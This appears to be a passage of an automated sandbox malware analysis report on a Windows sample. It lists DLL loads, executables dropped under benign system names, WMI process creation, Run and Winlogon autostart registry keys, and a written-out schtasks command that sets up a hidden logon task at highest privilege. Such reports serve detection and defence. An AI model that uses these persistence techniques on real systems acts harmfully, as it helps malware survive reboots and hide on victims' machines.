            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: mscoree.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: kernel.appcore.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: version.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: uxtheme.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: windows.storage.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: wldp.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: profapi.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: cryptsp.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: rsaenh.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: cryptbase.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: sspicli.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: amsi.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: userenv.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: edputil.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: rasapi32.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: rasman.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: rtutils.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: mswsock.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: winhttp.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: iphlpapi.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: dhcpcsvc.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: dnsapi.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: secur32.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: schannel.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: mskeyprotect.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: ntasn1.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: ncrypt.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: ncryptsslp.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: msasn1.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: gpapi.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: mscoree.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: kernel.appcore.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: version.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: uxtheme.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: windows.storage.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: wldp.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: profapi.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: cryptsp.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: rsaenh.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: cryptbase.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: sspicli.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: amsi.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: userenv.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: edputil.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: rasapi32.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: rasman.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: rtutils.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: mswsock.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: winhttp.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: iphlpapi.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: dhcpcsvc.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: dnsapi.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: secur32.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: schannel.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: mskeyprotect.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: ntasn1.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: ncrypt.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: ncryptsslp.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: msasn1.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: gpapi.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: mscoree.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: kernel.appcore.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: version.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: uxtheme.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: windows.storage.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: wldp.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: profapi.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: cryptsp.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: rsaenh.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: cryptbase.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: sspicli.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: amsi.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: userenv.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: edputil.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: rasapi32.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: rasman.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: rtutils.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: mswsock.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: winhttp.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: iphlpapi.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: dhcpcsvc.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: dnsapi.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: secur32.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: schannel.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: mskeyprotect.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: ntasn1.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: ncrypt.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: ncryptsslp.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: msasn1.dll
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: gpapi.dll
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeDirectory created: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeDirectory created: C:\Program Files\Mozilla Firefox\733f5148eb4a0e104b3ec895f92fbabca269cbccJump to behavior
            Source: 7fGdoA6Inq.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: 7fGdoA6Inq.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
            Source: 7fGdoA6Inq.exeStatic file information: File size 2781721 > 1048576
            Source: 7fGdoA6Inq.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x2a6a00
            Source: 7fGdoA6Inq.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: 7fGdoA6Inq.exeStatic PE information: real checksum: 0x2a81ba should be: 0x2b4929
            Source: wininit.exe.0.drStatic PE information: real checksum: 0x2a81ba should be: 0x2b4929
            Source: QtLimbtNymPOHuXh.exe.0.drStatic PE information: real checksum: 0x2a81ba should be: 0x2b4929
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeCode function: 7_2_00007FFD9BAC497C push es; retn 7002h7_2_00007FFD9BAC4A59
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeCode function: 7_2_00007FFD9BABD6DC push es; retn 7002h7_2_00007FFD9BABD7B9
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeCode function: 7_2_00007FFD9BABDE1C push es; retn 7002h7_2_00007FFD9BABDEF9
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeCode function: 7_2_00007FFD9BAC5AC5 push edx; retf 7_2_00007FFD9BAC5ACB
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeCode function: 7_2_00007FFD9BAB0989 push ss; ret 7_2_00007FFD9BAB099A
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeCode function: 7_2_00007FFD9BAC4CBB push esi; retf 7_2_00007FFD9BAC4CBC
            Source: C:\Windows\System32\Microsoft.Bluetooth.Service\RuntimeBroker.exeCode function: 8_2_00007FFD9BAA4869 pushfd ; iretd 8_2_00007FFD9BAA486A
            Source: C:\Windows\System32\Microsoft.Bluetooth.Service\RuntimeBroker.exeCode function: 8_2_00007FFD9BAA4A64 push esp; ret 8_2_00007FFD9BAA4A82
            Source: C:\PerfLogs\wininit.exeCode function: 9_2_00007FFD9BAC4869 pushfd ; iretd 9_2_00007FFD9BAC486A
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeCode function: 10_2_00007FFD9BAC4869 pushfd ; iretd 10_2_00007FFD9BAC486A
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeCode function: 12_2_00007FFD9BACFFEC push es; retn 7002h12_2_00007FFD9BAD00C9
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeCode function: 12_2_00007FFD9BACC30C push es; retn 7002h12_2_00007FFD9BACC3E9
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeCode function: 15_2_00007FFD9BACDBBC push es; retn 7002h15_2_00007FFD9BACDC99
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeCode function: 15_2_00007FFD9BAD5DEC push es; retn 7002h15_2_00007FFD9BAD5EC9
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeCode function: 15_2_00007FFD9BACDDBC push es; retn 7002h15_2_00007FFD9BACDE99
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeCode function: 15_2_00007FFD9BAC47B5 pushfd ; ret 15_2_00007FFD9BAC486A
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeCode function: 16_2_00007FFD9BAC5AFC push es; retn 7002h16_2_00007FFD9BAC5BD9
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeCode function: 16_2_00007FFD9BABDE1C push es; retn 7002h16_2_00007FFD9BABDEF9
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeCode function: 16_2_00007FFD9BABD89C push es; retn 7002h16_2_00007FFD9BABD979
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeCode function: 16_2_00007FFD9BAB0989 push ss; ret 16_2_00007FFD9BAB099A
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeCode function: 18_2_00007FFD9BACFFEC push es; retn 7002h18_2_00007FFD9BAD00C9
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeCode function: 18_2_00007FFD9BACC30C push es; retn 7002h18_2_00007FFD9BACC3E9
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeCode function: 18_2_00007FFD9BAD3DCF push esi; retf 18_2_00007FFD9BAD3E57
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeCode function: 18_2_00007FFD9BAD5CDC push es; retn 7002h18_2_00007FFD9BAD5DB9
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeCode function: 18_2_00007FFD9BAD3E58 push esi; retf 18_2_00007FFD9BAD3E57

            Persistence and Installation Behavior

            barindex
            Creates processes via WMI
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Drops PE files with benign system names
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeFile created: C:\PerfLogs\wininit.exeJump to dropped file
            Drops executable to a common third party application directory
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeFile written: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeJump to behavior
            Drops executables to the windows directory (C:\Windows) and starts them
            Source: unknownExecutable created and started: C:\Windows\System32\Microsoft.Bluetooth.Service\RuntimeBroker.exe
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeFile created: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeJump to dropped file
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeFile created: C:\PerfLogs\wininit.exeJump to dropped file
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeFile created: C:\Windows\System32\Microsoft.Bluetooth.Service\RuntimeBroker.exeJump to dropped file
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeFile created: C:\Windows\System32\Microsoft.Bluetooth.Service\RuntimeBroker.exeJump to dropped file

            Boot Survival

            barindex
            Creates an autostart registry key pointing to binary in C:\Windows
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
            Creates an undocumented autostart registry key
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
            Creates multiple autostart registry keys
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run QtLimbtNymPOHuXhJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run wininitJump to behavior
            Uses schtasks.exe or at.exe to add and modify task schedules
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "QtLimbtNymPOHuXh" /sc ONLOGON /tr "'C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe'" /rl HIGHEST /f
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run QtLimbtNymPOHuXhJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run QtLimbtNymPOHuXhJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run QtLimbtNymPOHuXhJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run QtLimbtNymPOHuXhJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run wininitJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run wininitJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run wininitJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run wininitJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
